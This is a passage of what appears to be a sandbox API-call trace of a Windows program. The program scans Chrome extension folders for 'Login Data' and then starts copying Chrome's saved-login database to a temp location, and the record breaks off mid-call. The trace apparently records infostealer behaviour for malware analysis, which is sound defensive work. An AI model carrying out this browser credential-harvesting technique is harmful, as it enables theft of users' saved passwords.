HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json", lpSrch="Login Data") returned 0x0 [0162.291] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json", lpSrch="Login Data") returned 0x0 [0162.292] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.292] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json", lpSrch="Login Data") returned 0x0 [0162.303] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json", lpSrch="Login Data") returned 0x0 [0162.303] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json", lpSrch="Login Data") returned 0x0 [0162.304] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json", lpSrch="Login Data") returned 0x0 [0162.305] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json", lpSrch="Login Data") returned 0x0 [0162.305] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json", lpSrch="Login Data") returned 0x0 [0162.307] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png", lpSrch="Login Data") returned 0x0 [0162.307] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js", lpSrch="Login Data") returned 0x0 [0162.307] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json", lpSrch="Login Data") returned 0x0 [0162.307] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js", lpSrch="Login Data") returned 0x0 [0162.308] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json", lpSrch="Login Data") returned 0x0 [0162.308] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js", lpSrch="Login Data") returned 0x0 [0162.310] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\af\\messages.json", lpSrch="Login Data") returned 0x0 [0162.310] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json", lpSrch="Login Data") returned 0x0 [0162.312] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json", lpSrch="Login Data") returned 0x0 [0162.312] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json", lpSrch="Login Data") returned 0x0 [0162.313] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json", lpSrch="Login Data") returned 0x0 [0162.313] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json", lpSrch="Login Data") returned 0x0 [0162.313] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json", lpSrch="Login Data") returned 0x0 [0162.314] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json", lpSrch="Login Data") returned 0x0 [0162.315] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json", lpSrch="Login Data") returned 0x0 [0162.315] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json", lpSrch="Login Data") returned 0x0 [0162.316] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json", lpSrch="Login Data") returned 0x0 [0162.316] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json", lpSrch="Login Data") returned 0x0 [0162.317] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json", lpSrch="Login Data") returned 0x0 [0162.317] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json", lpSrch="Login Data") returned 0x0 [0162.318] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\messages.json", lpSrch="Login Data") returned 0x0 [0162.318] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json", lpSrch="Login Data") returned 0x0 [0162.319] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json", lpSrch="Login Data") returned 0x0 [0162.319] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json", lpSrch="Login Data") returned 0x0 [0162.320] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json", lpSrch="Login Data") returned 0x0 [0162.320] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json", lpSrch="Login Data") returned 0x0 [0162.321] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.321] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json", lpSrch="Login Data") returned 0x0 [0162.322] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.322] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json", lpSrch="Login Data") returned 0x0 [0162.323] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json", lpSrch="Login Data") returned 0x0 [0162.323] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.324] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json", lpSrch="Login Data") returned 0x0 [0162.325] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json", lpSrch="Login Data") returned 0x0 [0162.325] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json", lpSrch="Login Data") returned 0x0 [0162.326] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json", lpSrch="Login Data") returned 0x0 [0162.326] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json", lpSrch="Login Data") returned 0x0 [0162.327] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json", lpSrch="Login Data") returned 0x0 [0162.327] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json", lpSrch="Login Data") returned 0x0 [0162.328] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json", lpSrch="Login Data") returned 0x0 [0162.328] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json", lpSrch="Login Data") returned 0x0 [0162.330] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json", lpSrch="Login Data") returned 0x0 [0162.330] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json", lpSrch="Login Data") returned 0x0 [0162.331] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json", lpSrch="Login Data") returned 0x0 [0162.332] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json", lpSrch="Login Data") returned 0x0 [0162.333] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json", lpSrch="Login Data") returned 0x0 [0162.333] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json", lpSrch="Login Data") returned 0x0 [0162.333] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json", lpSrch="Login Data") returned 0x0 [0162.334] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.334] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json", lpSrch="Login Data") returned 0x0 [0162.335] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json", lpSrch="Login Data") returned 0x0 [0162.335] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.336] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json", lpSrch="Login Data") returned 0x0 [0162.336] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.336] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json", lpSrch="Login Data") returned 0x0 [0162.337] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\messages.json", lpSrch="Login Data") returned 0x0 [0162.337] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json", lpSrch="Login Data") returned 0x0 [0162.338] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json", lpSrch="Login Data") returned 0x0 [0162.338] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json", lpSrch="Login Data") returned 0x0 [0162.339] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json", lpSrch="Login Data") returned 0x0 [0162.339] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.340] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.340] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json", lpSrch="Login Data") returned 0x0 [0162.341] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json", lpSrch="Login Data") returned 0x0 [0162.341] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json", lpSrch="Login Data") returned 0x0 [0162.342] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json", lpSrch="Login Data") returned 0x0 [0162.342] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json", lpSrch="Login Data") returned 0x0 [0162.343] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.343] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json", lpSrch="Login Data") returned 0x0 [0162.344] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json", lpSrch="Login Data") returned 0x0 [0162.344] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json", lpSrch="Login Data") returned 0x0 [0162.345] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json", lpSrch="Login Data") returned 0x0 [0162.345] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json", lpSrch="Login Data") returned 0x0 [0162.346] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json", lpSrch="Login Data") returned 0x0 [0162.346] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json", lpSrch="Login Data") returned 0x0 [0162.347] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json", lpSrch="Login Data") returned 0x0 [0162.347] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json", lpSrch="Login Data") returned 0x0 [0162.349] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js", lpSrch="Login Data") returned 0x0 [0162.349] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js", lpSrch="Login Data") returned 0x0 [0162.350] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css", lpSrch="Login Data") returned 0x0 [0162.350] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png", lpSrch="Login Data") returned 0x0 [0162.355] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png", lpSrch="Login Data") returned 0x0 [0162.356] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png", lpSrch="Login Data") returned 0x0 [0162.565] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x925550, Length=0xac) returned 0x3067751c [0162.572] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x925608 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp")) returned 0x6da1 [0162.573] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp")) returned 1 [0162.573] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), 